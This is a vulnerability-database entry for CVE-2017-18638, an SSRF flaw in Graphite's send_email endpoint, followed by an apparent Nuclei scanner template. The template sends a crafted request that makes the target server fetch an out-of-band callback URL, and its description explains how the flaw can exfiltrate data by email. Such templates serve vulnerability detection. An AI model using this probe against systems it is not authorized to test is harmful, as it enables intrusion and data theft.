| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2017-18638 | 11 Oct 2019 22:01 | – | cve |
| CVE-2017-18638 | 11 Oct 2019 22:01 | – | cvelist |
| [SECURITY] [DLA 1962-1] graphite-web security update | 21 Oct 2019 14:15 | – | debian |
| CVE-2017-18638 | 11 Oct 2019 22:01 | – | debiancve |
| Debian DLA-1962-1 : graphite-web security update | 22 Oct 2019 00:00 | – | nessus |
| Ubuntu 16.04 ESM / 18.04 ESM / 20.04 LTS / 22.04 LTS : Graphite-Web vulnerabilities (USN-6243-1) | 25 Jul 2023 00:00 | – | nessus |
| graphite.composer.views.send_email vulnerable to SSRF | 25 Oct 2019 13:55 | – | github |
| CVE-2017-18638 | 11 Oct 2019 23:15 | – | nvd |
| Debian: Security Advisory (DLA-1962-1) | 22 Oct 2019 00:00 | – | openvas |
| Ubuntu: Security Advisory (USN-6243-1) | 26 Jul 2023 00:00 | – | openvas |

```yaml
id: CVE-2017-18638

info:
  name: Graphite <=1.1.5 - Server-Side Request Forgery
  author: huowuzhao
  severity: high
  description: |
    Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSRF). The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
  impact: |
    An attacker can exploit this vulnerability to access internal resources, potentially leading to unauthorized access, data leakage, or further attacks.
  remediation: |
    Upgrade to a patched version of Graphite (>=1.1.6) or apply the necessary security patches.
  reference:
    - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
    - https://github.com/graphite-project/graphite-web/issues/2008
    - https://github.com/advisories/GHSA-vfj6-275q-4pvm
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18638
    - https://github.com/graphite-project/graphite-web/pull/2499
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-18638
    cwe-id: CWE-918
    epss-score: 0.16948
    epss-percentile: 0.96663
    cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: graphite_project
    product: graphite
  tags: cve,cve2017,graphite,ssrf,oast,graphite_project,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'

    # Matches when the OAST host records an HTTP interaction for this request
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a004730450220332c6d2c01fd67ebf80361171375e0f4fe53f720680372b8c06fafc56c5f1d8b022100a4fedf9af8362fc8c5365c12d6dad9369ce40695f8ec345d0bf9691d32d46657:922c64590222798bb761d5b6d8e72950
```